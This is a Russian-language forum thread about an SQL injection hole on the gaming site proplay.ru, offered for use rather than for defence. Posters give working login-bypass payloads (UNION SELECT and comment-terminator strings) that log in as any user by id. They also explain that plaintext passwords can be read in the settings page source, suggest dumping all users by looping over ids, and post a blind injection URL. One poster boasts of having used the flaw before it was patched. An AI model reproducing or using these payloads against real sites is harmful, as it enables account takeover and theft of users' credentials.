|
Уязвимость на proplay.ru
Посодействовал l1ght, за что ему большое спасибо. Суть баги в том, что можно залогиниться под любым аккаунтом следующим способом:
Логин: -1 Пароль: ' union select id,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll/* Где id - id юзера. :) |
Как уже сказал гема хватает просто:
user'/* asd И ещё, если хотите узнать пароль - зайдите в /users/settings/ там будет пароль за звёздочками, открывайте сорцы страницы - там будет пароль в чистом виде... |
Первый метод подойдет, скажем, для создания БД всех юзеров (путем перебора id).
|
Эх.... жаль перекрыли уже :)) Но я успел поюзать .... Респект авторам!!! :cool:
|
http://www.proplay.ru/forums/cs/7909'/
есть еще одна sql токо не как немогу подобрать правильное кол-во полей кто поможет? |
:) Как подбираешь? Это не скуля, а просто бажок в скрипте, в частности, в инклудинге. Ничего там не поимеешь
З.Ы. Хотя сорри, затупил. Теперь вижу... |
На счет union точно не знаю. Посимвольный перебор:
Код:
http://www.proplay.ru/forums/q3'+and+ascii(lower(substring(version(),1,1)))=0x35+and+'1'='1/ |
| Время: 13:51 |